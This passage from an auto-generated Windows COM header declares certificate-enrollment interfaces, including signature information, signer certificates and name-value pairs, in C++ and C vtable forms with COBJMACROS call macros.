        virtual HRESULT STDMETHODCALLTYPE SetDefaultValues( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SignatureInformationVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SignatureInformation * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SignatureInformation * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SignatureInformation * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SignatureInformation * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKeyAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PublicKeyAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Parameters )( 
            __RPC__in IX509SignatureInformation * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Parameters )( 
            __RPC__in IX509SignatureInformation * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithmSet )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NullSigned )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *GetSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Pkcs7Signature,
            /* [in] */ VARIANT_BOOL SignatureKey,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetDefaultValues )( 
            __RPC__in IX509SignatureInformation * This);
        
        END_INTERFACE
    } IX509SignatureInformationVtbl;

    interface IX509SignatureInformation
    {
        CONST_VTBL struct IX509SignatureInformationVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SignatureInformation_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SignatureInformation_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SignatureInformation_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SignatureInformation_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SignatureInformation_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SignatureInformation_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SignatureInformation_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SignatureInformation_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509SignatureInformation_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_get_PublicKeyAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKeyAlgorithm(This,ppValue) ) 

#define IX509SignatureInformation_put_PublicKeyAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_PublicKeyAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_get_Parameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Parameters(This,Encoding,pValue) ) 

#define IX509SignatureInformation_put_Parameters(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Parameters(This,Encoding,Value) ) 

#define IX509SignatureInformation_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509SignatureInformation_get_AlternateSignatureAlgorithmSet(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithmSet(This,pValue) ) 

#define IX509SignatureInformation_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509SignatureInformation_put_NullSigned(This,Value)	\
    ( (This)->lpVtbl -> put_NullSigned(This,Value) ) 

#define IX509SignatureInformation_GetSignatureAlgorithm(This,Pkcs7Signature,SignatureKey,ppValue)	\
    ( (This)->lpVtbl -> GetSignatureAlgorithm(This,Pkcs7Signature,SignatureKey,ppValue) ) 

#define IX509SignatureInformation_SetDefaultValues(This)	\
    ( (This)->lpVtbl -> SetDefaultValues(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SignatureInformation_INTERFACE_DEFINED__ */


#ifndef __ISignerCertificate_INTERFACE_DEFINED__
#define __ISignerCertificate_INTERFACE_DEFINED__

/* interface ISignerCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISignerCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33d-217d-11da-b2a4-000e7bbb2b09")
    ISignerCertificate : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ X509PrivateKeyVerify VerifyType,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Pin( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISignerCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISignerCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISignerCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISignerCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISignerCertificate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ X509PrivateKeyVerify VerifyType,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        END_INTERFACE
    } ISignerCertificateVtbl;

    interface ISignerCertificate
    {
        CONST_VTBL struct ISignerCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISignerCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISignerCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISignerCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISignerCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISignerCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISignerCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISignerCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISignerCertificate_Initialize(This,MachineContext,VerifyType,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> Initialize(This,MachineContext,VerifyType,Encoding,strCertificate) ) 

#define ISignerCertificate_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define ISignerCertificate_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define ISignerCertificate_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define ISignerCertificate_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define ISignerCertificate_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define ISignerCertificate_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define ISignerCertificate_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define ISignerCertificate_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define ISignerCertificate_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define ISignerCertificate_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISignerCertificate_INTERFACE_DEFINED__ */


#ifndef __ISignerCertificates_INTERFACE_DEFINED__
#define __ISignerCertificates_INTERFACE_DEFINED__

/* interface ISignerCertificates */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISignerCertificates;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33e-217d-11da-b2a4-000e7bbb2b09")
    ISignerCertificates : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Find( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCert,
            /* [retval][out] */ __RPC__out LONG *piSignerCert) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISignerCertificatesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISignerCertificates * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISignerCertificates * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISignerCertificates * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISignerCertificates * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ISignerCertificates * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ISignerCertificates * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ISignerCertificates * This);
        
        HRESULT ( STDMETHODCALLTYPE *Find )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCert,
            /* [retval][out] */ __RPC__out LONG *piSignerCert);
        
        END_INTERFACE
    } ISignerCertificatesVtbl;

    interface ISignerCertificates
    {
        CONST_VTBL struct ISignerCertificatesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISignerCertificates_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISignerCertificates_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISignerCertificates_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISignerCertificates_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISignerCertificates_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISignerCertificates_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISignerCertificates_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISignerCertificates_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ISignerCertificates_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ISignerCertificates_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ISignerCertificates_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ISignerCertificates_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ISignerCertificates_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ISignerCertificates_Find(This,pSignerCert,piSignerCert)	\
    ( (This)->lpVtbl -> Find(This,pSignerCert,piSignerCert) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISignerCertificates_INTERFACE_DEFINED__ */


#ifndef __IX509NameValuePair_INTERFACE_DEFINED__
#define __IX509NameValuePair_INTERFACE_DEFINED__

/* interface IX509NameValuePair */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509NameValuePair;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33f-217d-11da-b2a4-000e7bbb2b09")
    IX509NameValuePair : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strName,
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Value( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509NameValuePairVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509NameValuePair * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509NameValuePair * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509NameValuePair * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509NameValuePair * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Value )( 
            __RPC__in IX509NameValuePair * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IX509NameValuePair * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509NameValuePairVtbl;

    interface IX509NameValuePair
    {
        CONST_VTBL struct IX509NameValuePairVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509NameValuePair_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509NameValuePair_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509NameValuePair_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509NameValuePair_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509NameValuePair_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509NameValuePair_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509NameValuePair_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509NameValuePair_Initialize(This,strName,strValue)	\
    ( (This)->lpVtbl -> Initialize(This,strName,strValue) ) 

#define IX509NameValuePair_get_Value(This,pValue)	\
    ( (This)->lpVtbl -> get_Value(This,pValue) ) 

#define IX509NameValuePair_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509NameValuePair_INTERFACE_DEFINED__ */


#ifndef __IX509NameValuePairs_INTERFACE_DEFINED__
#define __IX509NameValuePairs_INTERFACE_DEFINED__

/* interface IX509NameValuePairs */
/* [helpstring][dual][uuid][object] */ 


